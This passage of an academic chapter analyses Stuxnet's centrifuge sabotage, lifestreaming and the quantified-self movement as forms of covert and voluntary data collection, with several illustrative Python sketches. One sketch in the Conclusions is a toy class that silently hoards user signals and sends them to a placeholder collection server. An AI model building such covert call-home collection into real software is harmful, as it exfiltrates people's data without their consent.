&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
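&lt;br /&gt;
Zetter’s description can be summarised as a simple timetable, and the sketch below renders it as one (this is my own schematic reconstruction in Python, not Stuxnet’s actual code, which targeted Siemens PLCs): long stretches of normal operation at the nominal 1,064 Hz, punctuated alternately by a short over-speed run near the rotors’ mechanical limit and a longer near-standstill, all while recorded ‘normal’ sensor data is replayed to the operators. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import itertools&lt;br /&gt;
&lt;br /&gt;
NOMINAL_HZ = 1064&lt;br /&gt;
&lt;br /&gt;
def attack_sequence():&lt;br /&gt;
    # Yields (duration in days, commanded frequency in Hz), per Zetter (2011).&lt;br /&gt;
    while True:&lt;br /&gt;
        yield (27, NOMINAL_HZ)   # weeks of normal-looking operation&lt;br /&gt;
        yield (15 / 1440, 1410)  # about 15 minutes near the rotor limit&lt;br /&gt;
        yield (27, NOMINAL_HZ)&lt;br /&gt;
        yield (50 / 1440, 2)     # 50 minutes almost stopped, fatiguing motors&lt;br /&gt;
&lt;br /&gt;
# Print the first two 27-day cycles of the schedule.&lt;br /&gt;
for days, hz in itertools.islice(attack_sequence(), 8):&lt;br /&gt;
    print('hold %4d Hz for %7.3f days' % (hz, days))&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;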
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) the capability to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures, and the second, larger warhead, 417, manipulated valves in the centrifuges and faked industrial process control sensor signals by modeling the centrifuges, which were grouped into cascades of 164 (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan -&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and, in a very short time, learn techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years as ‘real-time streams’ platforms like Twitter and Facebook have expanded. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, with its text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect his own data systematically, starting in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
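&lt;br /&gt;
To make Freeman’s description of the lifestream less abstract, here is a toy sketch of one (my own illustration in Python, not Freeman and Gelernter’s system): a single time-ordered store in which a document’s position is its timestamp, future items such as reminders sit ahead of the present, and ‘substreams’ are produced by querying rather than by filing things into folders. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import bisect, time&lt;br /&gt;
&lt;br /&gt;
class Lifestream:&lt;br /&gt;
    def __init__(self):&lt;br /&gt;
        self.docs = []  # (timestamp, text) pairs, kept in time order&lt;br /&gt;
&lt;br /&gt;
    def store(self, text, timestamp=None):&lt;br /&gt;
        t = timestamp if timestamp is not None else time.time()&lt;br /&gt;
        bisect.insort(self.docs, (t, text))  # future items sort ahead&lt;br /&gt;
&lt;br /&gt;
    def substream(self, keyword):&lt;br /&gt;
        # 'Organize on demand': a query, not a folder, groups documents.&lt;br /&gt;
        return [doc for doc in self.docs if keyword in doc[1]]&lt;br /&gt;
&lt;br /&gt;
stream = Lifestream()&lt;br /&gt;
stream.store('electronic birth certificate', timestamp=0.0)&lt;br /&gt;
stream.store('email: budget meeting moved to Friday')&lt;br /&gt;
stream.store('reminder: submit budget report', timestamp=time.time() + 86400)&lt;br /&gt;
print(stream.substream('budget'))  # a substream of budget-related documents&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;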
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
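The standard gives this anatomy a concrete shape. Below is a minimal sketch of such an activity in the JSON Activity Streams 1.0 form, rendering the quoted ‘Geraldine posted a photo to her album’ example; the key names follow the specification, while the values are my own illustration. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import json&lt;br /&gt;
&lt;br /&gt;
# 'Geraldine posted a photo to her album' as actor/verb/object/target.&lt;br /&gt;
activity = {&lt;br /&gt;
    'published': '2012-03-04T15:04:55Z',&lt;br /&gt;
    'actor': {'objectType': 'person', 'displayName': 'Geraldine'},&lt;br /&gt;
    'verb': 'post',&lt;br /&gt;
    'object': {'objectType': 'photo', 'url': 'http://example.org/photo1.jpg'},&lt;br /&gt;
    'target': {'objectType': 'photo-album', 'displayName': 'Holiday snaps'},&lt;br /&gt;
}&lt;br /&gt;
print(json.dumps(activity, indent=2))&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;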
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) or the organization (such as Facebook), the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class of others.[13] &lt;br /&gt;
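&lt;br /&gt;
The simplest version of this pattern-matching step is a comparison of today’s reading against the user’s own history. The sketch below (in Python, with invented numbers) computes how far a day’s value deviates from the personal norm, which is the kind of calculation that sits behind a ‘you walked less than usual’ prompt. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import statistics&lt;br /&gt;
&lt;br /&gt;
history = [7200, 6900, 8100, 7600, 7300, 6800, 7900]  # e.g. daily step counts&lt;br /&gt;
today = 3100&lt;br /&gt;
&lt;br /&gt;
mean = statistics.mean(history)&lt;br /&gt;
stdev = statistics.stdev(history)&lt;br /&gt;
z = (today - mean) / stdev&lt;br /&gt;
print('deviation from personal norm: %.1f standard deviations' % z)&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;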
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narrative through a stabilised web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers [Eds: does an 'and' need to be inserted here?] carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. [Eds: again, do you need to provide some examples of these important questions?] However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: they are passive in quality – under the surface, relatively benign and silent – but aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also [Eds: 'also' is repeated a number of times here] useful in terms of the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, that is, server computers designed specifically for the task and accessed via networks. Indeed, many viruses seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
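&lt;br /&gt;
That dichotomous structure can be sketched schematically (this is a deliberately toy illustration in Python; the class, endpoint and fields are invented): collection is passive and local, while aggregation and sense-making are offloaded to a remote server in the very act of ‘calling home’. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import json, urllib.request&lt;br /&gt;
&lt;br /&gt;
class Compactant:&lt;br /&gt;
    def __init__(self, endpoint):&lt;br /&gt;
        self.endpoint = endpoint  # e.g. 'http://collect.example.com/ingest'&lt;br /&gt;
        self.hoard = []           # silently accumulated behavioural signals&lt;br /&gt;
&lt;br /&gt;
    def observe(self, signal):&lt;br /&gt;
        self.hoard.append(signal)  # passive: never interrupts the user&lt;br /&gt;
&lt;br /&gt;
    def call_home(self):&lt;br /&gt;
        # Aggressive: ships the whole hoard; aggregation happens remotely.&lt;br /&gt;
        data = json.dumps(self.hoard).encode('utf-8')&lt;br /&gt;
        req = urllib.request.Request(self.endpoint, data=data)&lt;br /&gt;
        return urllib.request.urlopen(req)&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;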
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, there is an explicit normative context to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series-structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software and the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
